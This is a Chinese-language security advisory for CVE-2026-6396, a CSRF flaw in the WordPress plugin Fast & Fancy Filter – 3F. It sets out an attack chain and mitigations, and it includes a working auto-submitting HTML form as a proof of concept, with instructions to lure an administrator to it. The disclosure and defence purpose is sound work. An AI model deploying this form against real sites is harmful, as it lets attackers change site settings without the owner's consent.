IPBUF安全漏洞报告
English
CVE-2026-6396 CVSS 4.3 中危

CVE-2026-6396: Fast & Fancy Filter插件CSRF漏洞

披露日期: 2026-04-22

漏洞信息

漏洞编号
CVE-2026-6396
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Fast & Fancy Filter – 3F

相关标签

CSRFWordPressPlugin VulnerabilityWeb SecurityIntegrity

漏洞概述

WordPress插件Fast & Fancy Filter – 3F在1.2.2及之前版本中存在跨站请求伪造(CSRF)漏洞。该漏洞源于处理fff_save_settins AJAX动作的saveFields()函数缺少nonce验证。未经身份验证的攻击者可以通过伪造请求诱导管理员点击恶意链接,从而修改插件过滤设置、更新任意选项或创建新的过滤器文章。

技术细节

该漏洞的根本原因在于WordPress插件开发过程中未对AJAX请求进行有效的身份验证和状态检查。在受影响版本的class-admin.php文件中,saveFields()函数直接处理由fff_save_settins动作触发的请求数据。由于缺少check_ajax_referer()或类似的Nonce验证机制,服务器无法区分请求是由管理员自愿发起的还是由攻击者伪造的。攻击者可构造包含隐藏表单的恶意网页,当管理员访问时,浏览器自动携带会话Cookie发送请求,导致服务器执行非预期的设置修改操作,破坏了系统数据的完整性。

攻击链分析

STEP 1
侦察
攻击者确认目标站点使用了存在漏洞的Fast & Fancy Filter – 3F插件版本(<= 1.2.2)。
STEP 2
武器化
攻击者构造一个恶意的HTML页面,其中包含指向目标站点/wp-admin/admin-ajax.php的POST请求,action参数设为fff_save_settins,并附带恶意修改的参数。
STEP 3
投递
攻击者通过钓鱼邮件、论坛留言或社会工程学手段,将恶意链接发送给目标WordPress站点的管理员。
STEP 4
利用
管理员在登录状态下点击了恶意链接,浏览器自动向目标站点发送伪造的HTTP请求,该请求携带了管理员的有效Cookie。
STEP 5
达成目标
由于服务器端缺少Nonce验证,请求被成功处理,攻击者成功修改了插件设置或更新了数据库选项。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2026-6396: CSRF in Fast & Fancy Filter Plugin Description: This HTML snippet demonstrates how a forged request can be sent to modify plugin options. Usage: Host this code on a server and trick the admin into visiting the URL. --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://target-wordpress-site/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="fff_save_settins" /> <input type="hidden" name="option_name" value="malicious_payload" /> <input type="submit" value="Click to view prize" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

影响范围

Fast & Fancy Filter – 3F <= 1.2.2

防御指南

临时缓解措施
建议管理员立即检查并更新Fast & Fancy Filter插件。若无法立即更新,应临时禁用该插件以阻断攻击路径。此外,管理员应提高安全意识,不要轻易点击来源不明的链接,并在完成后台管理操作后及时登出。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表